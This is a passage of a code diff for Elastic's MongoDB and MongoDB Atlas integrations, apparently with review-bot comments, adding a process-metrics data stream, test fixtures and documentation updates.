--- a/packages/mongodb/_dev/deploy/docker/docker-compose.yml +++ b/packages/mongodb/_dev/deploy/docker/docker-compose.yml @@ -1,14 +1,15 @@ version: '2.3' services: mongodb: - build: creator + image: docker.elastic.co/integrations-ci/beats-mongodb:${MONGODB_VERSION:-5.0}-1 + build: + context: ./creator + args: + MONGODB_VERSION: ${MONGODB_VERSION:-5.0} ports: - - 27017 - command: - - '--replSet' - - 'beats' + - 27017:27017 mongodb-log: - image: docker.elastic.co/integrations-ci/beats-mongodb:${MONGODB_VERSION:-3.4}-1 + image: docker.elastic.co/integrations-ci/beats-mongodb:${MONGODB_VERSION:-5.0}-1 user: root build: context: . @@ -16,4 +17,3 @@ services: - ${SERVICE_LOGS_DIR}:/var/log/mongodb entrypoint: > bash -c "chmod a+wx /var/log/mongodb && chmod a+r -R /var/log/mongodb && touch /var/log/mongodb/mongod.log && chmod 644 /var/log/mongodb/mongod.log && mongod --replSet beats --logpath /var/log/mongodb/mongod.log --logappend" - diff --git a/packages/mongodb/changelog.yml b/packages/mongodb/changelog.yml index 38d5a18b36d..cf136ab1599 100644 --- a/packages/mongodb/changelog.yml +++ b/packages/mongodb/changelog.yml 
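Review bot: The `mongodb` service's new `build.args` passes `MONGODB_VERSION`, but `creator/Dockerfile` declares `ARG SERVICE_VERSION` and its `FROM mongo:${SERVICE_VERSION}` reads that name, so the value never reaches the build and every image silently uses the 5.0 default regardless of `MONGODB_VERSION`; use `SERVICE_VERSION: ${MONGODB_VERSION:-5.0}` (or rename the Dockerfile ARG) so the version matrix actually varies the service under test. Changing `ports` from `- 27017` to `- 27017:27017` also binds a fixed host port on all interfaces: parallel jobs on one CI host will collide on it, and this mongod runs with no authentication configured, so it is reachable from the host network for the test's lifetime — the ephemeral mapping, or at least `127.0.0.1:27017:27017`, avoids both. Note too that `--replSet beats` was removed from `mongodb` while `mongodb-log` still starts with `--replSet beats`; if any metrics test expects replica-set status fields, this is a behavioural change worth confirming.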
@@ -1,3 +1,23 @@ +- version: 1.13.3 + changes: + - description: Update README with support of LDAP authentication. + type: enhancement + link: https://github.com/elastic/integrations/pull/9526 +- version: 1.13.2 + changes: + - description: Update the Kibana version to fix the disk space exhaustion. + type: bugfix + link: https://github.com/elastic/integrations/pull/9221 +- version: 1.13.1 + changes: + - description: Update the Kibana version condition for multihost fix support and add MongoDB `hosts` field examples to the documentation. + type: bugfix + link: https://github.com/elastic/integrations/pull/9189 +- version: 1.13.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 1.12.3 changes: - description: Update metrics datastreams compatibility version in docs. diff --git a/packages/mongodb/docs/README.md b/packages/mongodb/docs/README.md index c7cf73d6ed0..a77e688e17d 100644 --- a/packages/mongodb/docs/README.md +++ b/packages/mongodb/docs/README.md 
@@ -2,6 +2,35 @@ This integration is used to fetch logs and metrics from [MongoDB](https://www.mongodb.com/). +## Configuration Notes + +When configuring the `hosts` option, MongoDB URIs must adhere to the following formats: + +- Simple: `mongodb://[user:pass@]host[:port][?options]` +- Complex: `mongodb://[username:password@]host1[:port1][,...hostN[:portN]][/[defaultauthdb][?options]]` + +Examples of URIs can vary from simple to complex: + +- Simple: `localhost` +- Complex: `mongodb://myuser:mypass@localhost:40001", "otherhost:40001` + +Additional supported URI examples include: + +- Replica set: `mongodb://localhost:27017,localhost:27022,localhost:27023/?replicaSet=dbrs` +- Direct connection: `mongodb://localhost:27017/?directConnection=true` + +When using the `directConnection=true` parameter in the connection URI, all operations are executed on the specified host. It's important to explicitly include `directConnection=true` in the URI as it won't be automatically added. + +- Authentication: `mongodb://username:password@host:port/authSource=$external?authMechanism=PLAIN` + +When specifying `authMechanism` as PLAIN, it indicates the use of the PLAIN authentication mechanism, which is commonly associated with LDAP. + +`authSource` can be used to specify the name of the database that has the collection with the user credentials. + +In MongoDB, `authSource=$external` is a special authentication database used for authenticating users externally, such as via LDAP. + +The username and password can either be included in the URI or set using the respective configuration options. If included in the URI, these credentials take precedence over any configured username and password configuration options. + ## Compatibility The `log` dataset is tested with logs from versions v3.2.11 and v4.4.4 in 
@@ -28,6 +57,10 @@ db.createUser( } ) ``` +You can use the following command in Mongo shell to authenticate a user against a specific database with the provided username and password (make sure you are using the `admin` db by using `db` command in Mongo shell). +``` +db.auth(user, pass) +``` You can use the following command in Mongo shell to grant the role to an existing user (make sure you are using the `admin` db by using `db` command in diff --git a/packages/mongodb/manifest.yml b/packages/mongodb/manifest.yml index ef227d1e5fe..eb00ab42757 100644 --- a/packages/mongodb/manifest.yml +++ b/packages/mongodb/manifest.yml @@ -1,6 +1,6 @@ name: mongodb title: MongoDB -version: "1.12.3" +version: "1.13.3" description: Collect logs and metrics from MongoDB instances with Elastic Agent. type: integration categories: @@ -11,10 +11,10 @@ icons: title: logo mongodb size: 32x32 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.2" conditions: kibana: - version: "^8.8.0" + version: "^8.12.2" elastic: subscription: basic screenshots: @@ -89,6 +89,7 @@ policy_templates: multi: false required: false show_user: false + secret: true title: Collect MongoDB metrics description: Collecting metrics from MongoDB instances owner: diff --git a/packages/mongodb_atlas/_dev/build/docs/README.md b/packages/mongodb_atlas/_dev/build/docs/README.md index d6a6c74623c..1d89ec5e88c 100644 --- a/packages/mongodb_atlas/_dev/build/docs/README.md +++ b/packages/mongodb_atlas/_dev/build/docs/README.md 
@@ -6,19 +6,23 @@ Use the MongoDB Atlas integration to: -- Collect MongoDB Audit logs for comprehensive monitoring and analysis. +- Collect MongoDB Audit logs and Process metrics for comprehensive monitoring and analysis. - Create informative visualizations to track usage trends, measure key metrics, and derive actionable business insights. - Set up alerts to minimize Mean Time to Detect (MTTD) and Mean Time to Resolve (MTTR) by quickly referencing relevant logs during troubleshooting. ## Data streams -The MongoDB Atlas integration collects logs. +The MongoDB Atlas integration collects logs and metrics. Logs help you keep a record of events that happen on your machine. The `Log` data stream collected by MongoDB Atlas integration is `mongod_audit`. +Metrics give you insight into the statistics of the MongoDB Atlas. The `Metric` data stream collected by the MongoDB Atlas integration is `process` so that the user can monitor and troubleshoot the performance of the MongoDB Atlas instance. + Data streams: - `mongod_audit`: The auditing facility allows administrators and users to track system activity for deployments with multiple users and applications. Mongod Audit logs capture events related to database operations such as insertions, updates, deletions, user authentication, etc., occurring within the mongod instances. +- `process` : This data stream collects host metrics per process for all the hosts of the specified group. Metrics like measurements for the host, such as CPU usage, number of I/O operations and memory are available on this data stream. + Note: - Users can monitor and see the log inside the ingested documents for MongoDB Atlas in the `logs-*` index pattern from `Discover`. 
@@ -28,18 +32,25 @@ You can store and search your data using Elasticsearch and visualize and manage ## Setup -### To collect data from MongoDB Atlas, the following parameters from your MongoDB Atlas instance are required: +### To collect data from MongoDB Atlas, the following parameters from your MongoDB Atlas instance are required 1. Public Key 2. Private Key 3. GroupId -### Steps to obtain Public Key, Private Key and GroupId: +### Steps to obtain Public Key, Private Key and GroupId 1. Generate programmatic API Keys with project owner permissions using the instructions in the Atlas [documentation](https://www.mongodb.com/docs/atlas/configure-api-access/#create-an-api-key-for-a-project). Then, copy the public key and private key. These serve the same function as a username and API Key respectively. 2. Enable Database Auditing for the Atlas project you want to monitor logs. You can follow the instructions provided in this Atlas [document](https://www.mongodb.com/docs/atlas/database-auditing/#procedure). 3. You can find your Project ID (Group ID) in the Atlas UI. To do this, navigate to your project, click on Settings, and copy the Project ID (Group ID). You can also programmatically find it using the Atlas Admin API or Atlas CLI as described in this Atlas [document](https://www.mongodb.com/docs/atlas/app-services/apps/metadata/#find-a-project-id). +### Important terms of MongoDB Atlas API + +1. Granularity: Duration that specifies the interval at which Atlas reports the metrics. +2. Period: Duration over which Atlas reports the metrics. + +Note: Both of above attributes can be set by using `period` in configuration parameters. + ### Steps to enable Integration in Elastic 1. In Kibana go to Management > Integrations 
@@ -72,4 +83,13 @@ This is the `mongod_audit` data stream. This data stream allows administrators a {{event "mongod_audit"}} -{{fields "mongod_audit"}} \ No newline at end of file +{{fields "mongod_audit"}} + +## Metrics reference + +### Process +This data stream collects host metrics per process for all the hosts of the specified group. Metrics like measurements for the host, such as CPU usage, number of I/O operations and memory are available on this data stream. + +{{event "process"}} + +{{fields "process"}} diff --git a/packages/mongodb_atlas/_dev/deploy/docker/mongodb_atlas/test b/packages/mongodb_atlas/_dev/deploy/docker/mongodb_atlas/test index e47ddb26a99..10c9c4b31e8 100755 Binary files a/packages/mongodb_atlas/_dev/deploy/docker/mongodb_atlas/test and b/packages/mongodb_atlas/_dev/deploy/docker/mongodb_atlas/test differ diff --git a/packages/mongodb_atlas/changelog.yml b/packages/mongodb_atlas/changelog.yml index d06b0c9748d..10de1cb5417 100644 --- a/packages/mongodb_atlas/changelog.yml +++ b/packages/mongodb_atlas/changelog.yml @@ -1,6 +1,11 @@ # newer versions go on top -- version: "0.0.1" +- version: "0.0.2" changes: - description: MongoDB Atlas integration package with "mongod_audit" data stream. type: enhancement link: https://github.com/elastic/integrations/pull/9020 +- version: "0.0.1" + changes: + - description: MongoDB Atlas integration package with "process" data stream. + type: enhancement + link: https://github.com/elastic/integrations/pull/9552 diff --git a/packages/mongodb_atlas/data_stream/mongod_audit/agent/stream/input.yml.hbs b/packages/mongodb_atlas/data_stream/mongod_audit/agent/stream/input.yml.hbs index 938741c6ba8..b45dff66716 100644 --- a/packages/mongodb_atlas/data_stream/mongod_audit/agent/stream/input.yml.hbs +++ b/packages/mongodb_atlas/data_stream/mongod_audit/agent/stream/input.yml.hbs 
@@ -50,7 +50,7 @@ program: | "endDate": int(now) })).as(state, state.with(request("GET", state.url + "/api/atlas/v2/groups/" + state.groupId + "/processes?pageNum=" + string(state.page_num) + "&itemsPerPage=100").with({ "Header": { - "Accept": ["application/vnd.atlas." + string(timestamp(now).getFullYear()) + "-01-01+json"] + "Accept": ["application/vnd.atlas." + string(now.getFullYear()) + "-01-01+gzip"] } }).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { @@ -65,7 +65,7 @@ program: | request("GET", state.url + "/api/atlas/v2/groups/" + state.groupId + "/clusters/" + state.hostlist[state.next] + "/logs/mongodb-audit-log.gz?startDate=" + string(int(state.startDate)) + "&endDate=" + string(int(state.endDate)) ).with({ "Header": { - "Accept": ["application/vnd.atlas." + string(timestamp(now).getFullYear()) + "-01-01+gzip"] + "Accept": ["application/vnd.atlas." + string(now.getFullYear()) + "-01-01+gzip"] } }).do_request().as(resp, ( resp.StatusCode == 200 && resp.ContentLength != 0 @@ -104,4 +104,4 @@ program: | : {} ) - ) \ No newline at end of file + ) diff --git a/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-common-config.yml b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..e071d397ddf --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,2 @@ +dynamic_fields: + "event.ingested": ".*" diff --git a/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json new file mode 100644 index 00000000000..73561ff522e --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json 
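Review bot: The first hunk changes the `Accept` header of the `/processes` listing request from `+json` to `+gzip`, yet the response is still fed to `bytes(resp.Body).decode_json()`; `+gzip` is the media type the audit-log download below uses for a gzipped file, and a JSON listing endpoint is unlikely to honour it (expect a 406 or a body `decode_json()` cannot parse), so this looks like an accidental edit alongside the intended `timestamp(now)` → `now` cleanup — it should read `"Accept": ["application/vnd.atlas." + string(now.getFullYear()) + "-01-01+json"]`. Both headers also pin the API version to `<current year>-01-01`; Atlas versions are dated releases and a January-1st version does not necessarily exist for every year, so pinning a known version string (or exposing it as a config var) would be more robust — hedged, since the Atlas version list is not visible from here. The CEL program starts and ends outside these hunks.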
@@ -0,0 +1,144 @@ +{ + "events": [ + { + "groupId": "646f4379c47da356740d14ad", + "hostId": "atlas-ccx4uc-shard-00-00.q5ljb.mongodb.net:27017", + "response": { + "ASSERT_MSG": 0.213805548, + "ASSERT_REGULAR": 0.33244343545, + "ASSERT_USER": 0.34219922212309, + "ASSERT_WARNING": 0.33245678912, + "BACKGROUND_FLUSH_AVG": 0.224438123, + "CACHE_DIRTY_BYTES": 12567.12, + "CACHE_BYTES_READ_INTO": 132153.9, + "CACHE_USED_BYTES": 821456778.500023, + "CACHE_BYTES_WRITTEN_FROM": 1328.7865221233, + "CONNECTIONS": 38, + "MAX_PROCESS_NORMALIZED_CPU_CHILDREN_KERNEL": 0.33455633344, + "MAX_PROCESS_CPU_CHILDREN_KERNEL": 0.182233244, + "PROCESS_CPU_CHILDREN_KERNEL": 0.223444567789, + "MAX_PROCESS_CPU_CHILDREN_USER": 0.2789877666, + "PROCESS_CPU_CHILDREN_USER": 0.127876554, + "MAX_PROCESS_CPU_KERNEL": 0.198877766, + "PROCESS_CPU_KERNEL": 0.23777324612388449, + "PROCESS_NORMALIZED_CPU_CHILDREN_KERNEL": 0.21343458834492, + "MAX_PROCESS_NORMALIZED_CPU_CHILDREN_USER": 0.2426637278, + "PROCESS_NORMALIZED_CPU_CHILDREN_USER": 0.434455522443, + "MAX_PROCESS_NORMALIZED_CPU_KERNEL": 0.98763331334444322, + "PROCESS_NORMALIZED_CPU_KERNEL": 0.07326222334291, + "MAX_PROCESS_NORMALIZED_CPU_USER": 3.9237183371832, + "PROCESS_NORMALIZED_CPU_USER": 0.6547433822844, + "MAX_PROCESS_CPU_USER": 8.934677738289, + "PROCESS_CPU_USER": 1.0725321162733222133, + "CURSORS_TOTAL_OPEN": 3, + "CURSORS_TOTAL_TIMED_OUT": 2.987333711237, + "DB_DATA_SIZE_TOTAL": 12352234432, + "DB_STORAGE_TOTAL": 41235435, + "DOCUMENT_METRICS_DELETED": 0.35222371123144, + "DOCUMENT_METRICS_INSERTED": 0.298877313444, + "DOCUMENT_METRICS_RETURNED": 0.2333067316131, + "DOCUMENT_METRICS_UPDATED": 0.039932412345432, + "FTS_PROCESS_CPU_KERNEL": 0.22325346765433, + "FTS_PROCESS_NORMALIZED_CPU_KERNEL": 0.2137811999382, + "FTS_PROCESS_NORMALIZED_CPU_USER": 0.321445664321, + "FTS_PROCESS_CPU_USER": 0.24566543211, + "FTS_DISK_UTILIZATION": 0.1228391993818, + "FTS_MEMORY_MAPPED": 0.328123372383, + "FTS_MEMORY_RESIDENT": 0.12444445223, + 
"FTS_MEMORY_VIRTUAL": 0.1433342324553, + "GLOBAL_ACCESSES_NOT_IN_MEMORY": 3227372, + "GLOBAL_LOCK_CURRENT_QUEUE_READERS": 263737882, + "GLOBAL_LOCK_CURRENT_QUEUE_TOTAL": 4127712, + "GLOBAL_LOCK_CURRENT_QUEUE_WRITERS": 2153363, + "GLOBAL_PAGE_FAULT_EXCEPTIONS_THROWN": 3, + "EXTRA_INFO_PAGE_FAULTS": 1241, + "INDEX_COUNTERS_BTREE_ACCESSES": 14221, + "INDEX_COUNTERS_BTREE_HITS": 267712392, + "INDEX_COUNTERS_BTREE_MISS_RATIO": 1.623372, + "INDEX_COUNTERS_BTREE_MISSES": 132543, + "JOURNALING_COMMITS_IN_WRITE_LOCK": 11322, + "JOURNALING_MB": 1.2836627, + "JOURNALING_WRITE_DATA_FILES_MB": 23.23442, + "MAX_SYSTEM_NORMALIZED_CPU_USER": 23.87636632771, + "COMPUTED_MEMORY": 34.238, + "MEMORY_MAPPED": 21.32477234, + "MEMORY_RESIDENT": 190.4, + "MEMORY_VIRTUAL": 3242.1122, + "NETWORK_BYTES_IN": 313.872898381, + "NETWORK_BYTES_OUT": 20923.523387712, + "NETWORK_NUM_REQUESTS": 13.287773311191, + "OPCOUNTER_CMD": 13.472788221236, + "OPCOUNTER_DELETE": 0.8374367234442, + "OPCOUNTER_GETMORE": 1.34425467654, + "OPCOUNTER_INSERT": 0.24442323654, + "OPCOUNTER_QUERY": 0.1456555474455228, + "OPCOUNTER_REPL_CMD": 0.244556655421, + "OPCOUNTER_REPL_DELETE": 0.00456765432333333, + "OPCOUNTER_REPL_INSERT": 0.003333222133, + "OPCOUNTER_REPL_UPDATE": 0.05837348438, + "OPCOUNTER_UPDATE": 0.047555753224433, + "OP_EXECUTION_TIME_COMMANDS": 0.07347823122113, + "OP_EXECUTION_TIME_READS": 0.16234554981, + "OP_EXECUTION_TIME_WRITES": 0.24552345, + "OPERATIONS_SCAN_AND_ORDER": 0.36373718112, + "OPLOG_MASTER_LAG_TIME_DIFF": 2786665.435567, + "OPLOG_MASTER_TIME": 2771288.8755, + "OPLOG_RATE_GB_PER_HOUR": 0.0001341, + "OPLOG_REPLICATION_LAG": 0.00134322, + "OPLOG_SLAVE_LAG_MASTER_TIME": 21.23442, + "QUERY_EXECUTOR_SCANNED": 0.0033322145545511, + "QUERY_EXECUTOR_SCANNED_OBJECTS": 0.2663211245776, + "QUERY_TARGETING_SCANNED_OBJECTS_PER_RETURNED": 1.16235487878865, + "QUERY_TARGETING_SCANNED_PER_RETURNED": 0.007346657774388, + "RESTARTS_IN_LAST_HOUR": 6, + "MAX_SWAP_USAGE_FREE": 4193787.0000000004, + 
"SWAP_USAGE_FREE": 4193787.89324442122, + "SWAP_USAGE_USED": 511.8778888886, + "MAX_SWAP_USAGE_USED": 511.9999888888, + "MAX_SYSTEM_CPU_GUEST": 231.8657881111, + "SYSTEM_CPU_GUEST": 265.7363623321122, + "MAX_SYSTEM_CPU_IOWAIT": 111.335453221, + "SYSTEM_CPU_IOWAIT": 1.33334554555446, + "MAX_SYSTEM_CPU_IRQ": 1.243556311245, + "SYSTEM_CPU_IRQ": 2.233235555, + "MAX_SYSTEM_CPU_KERNEL": 13.3839493839467, + "SYSTEM_CPU_KERNEL": 1.413822809117, + "SYSTEM_CPU_NICE": 3.12455667777, + "MAX_SYSTEM_CPU_SOFTIRQ": 1.3880999000999, + "SYSTEM_CPU_SOFTIRQ": 0.09578823373226, + "MAX_SYSTEM_CPU_STEAL": 13.9995777339999, + "SYSTEM_CPU_STEAL": 0.7125933648776, + "MAX_SYSTEM_CPU_USER": 0.233311345555, + "SYSTEM_CPU_USER": 19.94005994777666, + "SYSTEM_MEMORY_AVAILABLE": 1297178.4, + "MAX_SYSTEM_MEMORY_AVAILABLE": 1287180, + "SYSTEM_MEMORY_FREE": 140886, + "MAX_SYSTEM_MEMORY_FREE": 149138.8, + "SYSTEM_MEMORY_USED": 567885.3, + "MAX_SYSTEM_MEMORY_USED": 1852490, + "SYSTEM_NETWORK_IN": 1345.89298711, + "MAX_SYSTEM_NETWORK_IN": 176129.9111111111002, + "MAX_SYSTEM_NETWORK_OUT": 11789.7, + "SYSTEM_NETWORK_OUT": 737.89400083167, + "MAX_SYSTEM_NORMALIZED_CPU_GUEST": 123.4435467577443, + "SYSTEM_NORMALIZED_CPU_GUEST": 122.332344335578, + "MAX_SYSTEM_NORMALIZED_CPU_IOWAIT": 0.7, + "SYSTEM_NORMALIZED_CPU_IOWAIT": 0.076625581546717, + "MAX_SYSTEM_NORMALIZED_CPU_IRQ": 0.086543389996543, + "SYSTEM_NORMALIZED_CPU_IRQ": 0.187666323010, + "MAX_SYSTEM_NORMALIZED_CPU_KERNEL": 8.78943256778111, + "SYSTEM_NORMALIZED_CPU_KERNEL": 0.9222388999125745, + "MAX_SYSTEM_NORMALIZED_CPU_NICE": 0.89631899, + "SYSTEM_NORMALIZED_CPU_NICE": 0.23488931133323, + "MAX_SYSTEM_NORMALIZED_CPU_SOFTIRQ": 0.59970029934565434, + "SYSTEM_NORMALIZED_CPU_SOFTIRQ": 0.06667564629406, + "MAX_SYSTEM_NORMALIZED_CPU_STEAL": 3.0995004995004996, + "SYSTEM_NORMALIZED_CPU_STEAL": 0.4948211119340082, + "SYSTEM_NORMALIZED_CPU_USER": 2.09939880605, + "TICKETS_AVAILABLE_READS": 127, + "TICKETS_AVAILABLE_WRITE": 126 + }, + "processId": 
"atlas-ccx4uc-shard-00-00.q5ljb.mongodb.net:27017" + } + ] +} diff --git a/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json-expected.json b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json-expected.json new file mode 100644 index 00000000000..176565d006f --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/_dev/test/pipeline/test-process-metrics.json-expected.json 
@@ -0,0 +1,479 @@ +{ + "expected": [ + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "process" + ], + "kind": "event", + "module": "mongodb_atlas", + "type": [ + "info" + ] + }, + "mongodb_atlas": { + "group_id": "646f4379c47da356740d14ad", + "host_id": "atlas-ccx4uc-shard-00-00.q5ljb.mongodb.net:27017", + "process": { + "assert": { + "msg": 0.213805548, + "regular": 0.33244343545, + "user": 0.34219922212309, + "warning": 0.33245678912 + }, + "background_flush": { + "avg": 0.224438123 + }, + "cache": { + "dirty": { + "bytes": 12567.12 + }, + "read": { + "bytes": 132153.9 + }, + "used": { + "total": { + "bytes": 8.21456778500023E8 + } + }, + "write": { + "bytes": 1328.7865221233 + } + }, + "connections": 38, + "cpu": { + "children": { + "kernel": { + "max": { + "pct": 0.182233244 + }, + "pct": 0.223444567789 + }, + "user": { + "max": { + "pct": 0.2789877666 + }, + "pct": 0.127876554 + } + }, + "kernel": { + "max": { + "pct": 0.198877766 + }, + "pct": 0.23777324612388448 + }, + "normalized": { + "children": { + "kernel": { + "max": { + "pct": 0.33455633344 + }, + "pct": 0.21343458834492 + }, + "user": { + "max": { + "pct": 0.2426637278 + }, + "pct": 0.434455522443 + } + }, + "kernel": { + "max": { + "pct": 0.9876333133444433 + }, + "pct": 0.07326222334291 + }, + "user": { + "max": { + "pct": 3.9237183371832 + }, + "pct": 0.6547433822844 + } + }, + "user": { + "max": { + "pct": 8.934677738289 + }, + "pct": 1.0725321162733221 + } + }, + "cursor": { + "open": { + "total": 3 + }, + "timed_out": { + "total": 2.987333711237 + } + }, + "database": { + "size": { + "total": { + "bytes": 12352234432 + } + }, + "storage": { + "total": { + "bytes": 41235435 + } + } + }, + "document": { + "deleted": 0.35222371123144, + "inserted": 0.298877313444, + "returned": 0.2333067316131, + "updated": 0.039932412345432 + }, + "fts": { + "cpu": { + "kernel": { + "pct": 0.22325346765433 + }, + "normalized": { + "kernel": { + "pct": 0.2137811999382 + }, + "user": { + 
"pct": 0.321445664321 + } + }, + "user": { + "pct": 0.24566543211 + } + }, + "disk": { + "utilization": { + "total": { + "bytes": 0.1228391993818 + } + } + }, + "memory": { + "mapped": { + "total": { + "bytes": 0.328123372383 + } + }, + "resident": { + "total": { + "bytes": 0.12444445223 + } + }, + "virtual": { + "total": { + "bytes": 0.1433342324553 + } + } + } + }, + "global": { + "access": { + "not_in_memory": 3227372 + }, + "lock": { + "current_queue": { + "reader": { + "count": 263737882 + }, + "total": 4127712, + "writer": { + "count": 2153363 + } + } + }, + "page_fault": { + "exception_thrown": 3 + } + }, + "host": { + "page_faults": 1241 + }, + "index": { + "btree": { + "access": { + "count": 14221 + }, + "hits": { + "count": 267712392 + }, + "miss": { + "count": 132543 + }, + "miss_ratio": { + "count": 1.623372 + } + } + }, + "journaling": { + "commits": { + "write_lock": 11322 + }, + "mb": 1.2836627, + "write": { + "data_files": { + "mb": 23.23442 + } + } + }, + "memory": { + "computed": { + "mb": 34.238 + }, + "mapped": { + "mb": 21.32477234 + }, + "resident": { + "mb": 190.4 + }, + "virtual": { + "mb": 3242.1122 + } + }, + "network": { + "in": 313.872898381, + "out": 20923.523387712, + "request": { + "total": 13.287773311191 + } + }, + "opcounter": { + "cmd": 13.472788221236, + "delete": 0.8374367234442, + "getmore": 1.34425467654, + "insert": 0.24442323654, + "query": 0.1456555474455228, + "repl": { + "cmd": 0.244556655421, + "delete": 0.00456765432333333, + "insert": 0.003333222133, + "update": 0.05837348438 + }, + "update": 0.047555753224433 + }, + "operation": { + "execution": { + "time": { + "cmd": { + "avg": { + "ms": 0.07347823122113 + } + }, + "read": { + "avg": { + "ms": 0.16234554981 + } + }, + "write": { + "avg": { + "ms": 0.24552345 + } + } + } + }, + "scan_and_order": 0.36373718112 + }, + "oplog": { + "master": { + "lag": { + "time_diff": { + "s": 2786665.435567 + } + }, + "time": { + "s": 2771288.8755 + } + }, + "rate": { + "gb_per_hour": 
1.341E-4 + }, + "repl_lag": { + "s": 0.00134322 + }, + "slave": { + "lag": { + "master": { + "time": { + "s": 21.23442 + } + } + } + } + }, + "query": { + "executor": { + "scanned": 0.0033322145545511, + "scanned_objects": 0.2663211245776 + }, + "targeting": { + "scanned_objects_per_returned": 1.16235487878865, + "scanned_per_returned": 0.007346657774388 + } + }, + "restart": { + "in_last_hour": 6 + }, + "swap": { + "usage": { + "free": { + "max": { + "kb": 4193787.0000000005 + } + }, + "total": { + "free": 4193787.893244421, + "used": 511.8778888886 + }, + "used": { + "max": { + "kb": 511.9999888888 + } + } + } + }, + "system": { + "cpu": { + "guest": { + "max": { + "pct": 231.8657881111 + }, + "pct": 265.7363623321122 + }, + "iowait": { + "max": { + "pct": 111.335453221 + }, + "pct": 1.33334554555446 + }, + "irq": { + "max": { + "pct": 1.243556311245 + }, + "pct": 2.233235555 + }, + "kernel": { + "max": { + "pct": 13.3839493839467 + }, + "pct": 1.413822809117 + }, + "nice": { + "pct": 3.12455667777 + }, + "softirq": { + "max": { + "pct": 1.3880999000999 + }, + "pct": 0.09578823373226 + }, + "steal": { + "max": { + "pct": 13.9995777339999 + }, + "pct": 0.7125933648776 + }, + "user": { + "max": { + "pct": 0.233311345555 + }, + "pct": 19.94005994777666 + } + }, + "memory": { + "available": { + "kb": 1297178.4, + "max": { + "kb": 1287180 + } + }, + "free": { + "kb": 140886, + "max": { + "kb": 149138.8 + } + }, + "used": { + "kb": 567885.3, + "max": { + "kb": 1852490 + } + } + }, + "network": { + "in": 1345.89298711, + "max": { + "in": 176129.9111111111, + "out": 11789.7 + }, + "out": 737.89400083167 + }, + "normalized": { + "cpu": { + "guest": { + "max": { + "pct": 123.4435467577443 + }, + "pct": 122.332344335578 + }, + "iowait": { + "max": { + "pct": 0.7 + }, + "pct": 0.076625581546717 + }, + "irq": { + "max": { + "pct": 0.086543389996543 + }, + "pct": 0.18766632301 + }, + "kernel": { + "max": { + "pct": 8.78943256778111 + }, + "pct": 0.9222388999125745 + }, + 
"nice": { + "max": { + "pct": 0.89631899 + }, + "pct": 0.23488931133323 + }, + "softirq": { + "max": { + "pct": 0.5997002993456544 + }, + "pct": 0.06667564629406 + }, + "steal": { + "max": { + "pct": 3.0995004995004996 + }, + "pct": 0.4948211119340082 + }, + "user": { + "max": { + "pct": 23.87636632771 + }, + "pct": 2.09939880605 + } + } + } + }, + "ticket": { + "available": { + "read": { + "count": 127 + }, + "write": { + "count": 126 + } + } + } + }, + "process_id": "atlas-ccx4uc-shard-00-00.q5ljb.mongodb.net:27017" + } + } + ] +} \ No newline at end of file diff --git a/packages/mongodb_atlas/data_stream/process/_dev/test/system/test-default-config.yml b/packages/mongodb_atlas/data_stream/process/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..19fe7ae9a87 --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/_dev/test/system/test-default-config.yml @@ -0,0 +1,13 @@ +vars: + url: + - http://{{Hostname}}:{{Port}} + public_key: + - admin + private_key: + - MongoDB@123 +data_stream: + vars: + groupId: + - mongodb-group1 +input: cel +service: mongodbatlas diff --git a/packages/mongodb_atlas/data_stream/process/agent/stream/input.yml.hbs b/packages/mongodb_atlas/data_stream/process/agent/stream/input.yml.hbs new file mode 100644 index 00000000000..3dc4b922602 --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/agent/stream/input.yml.hbs 
@@ -0,0 +1,69 @@ +config_version: 2 +interval: {{period}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} +auth.digest: + user: {{public_key}} + password: {{private_key}} +resource.url: {{url}} +state: + group_id: {{groupId}} + want_more: false + page_num: 1 + query: /measurements?granularity=PT{{period}}&period=PT{{period}} +redact: + fields: ~ +program: | + ( + has(state.hostlist) && size(state.hostlist) > 0 ? + state + : + state.with(request("GET", state.url + "/api/atlas/v2/groups/" + state.group_id + "/processes?pageNum=" + string(state.page_num) + "&itemsPerPage=100").with({ + "Header": { + "Accept": ["application/vnd.atlas." + string(now.getFullYear()) + "-01-01+json"] + } + }).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "hostlist": body.results.map(e, state.url + "/api/atlas/v2/groups/" + state.group_id + "/processes/" + e.id + state.query), + "next": 0, + "page_num": body.links.exists_one(res, res.rel == "next") ? int(state.page_num)+1 : 1 + }))) + ).as(state, state.next >= size(state.hostlist) ? {} : + request("GET", string(state.hostlist[state.next])).with({ + "Header": { + "Accept": ["application/vnd.atlas." + string(now.getFullYear()) + "-01-01+json"] + } + }).do_request().as(res, { + "events": bytes(res.Body).decode_json().as(f, f.with({"response": zip( + //Combining measurement names and actual values of measurement to generate `key : value` pairs. + f.measurements.map(m, m.name), + f.measurements.map(m, m.dataPoints.map(d, d.value).as(v, size(v) == 0 ? 
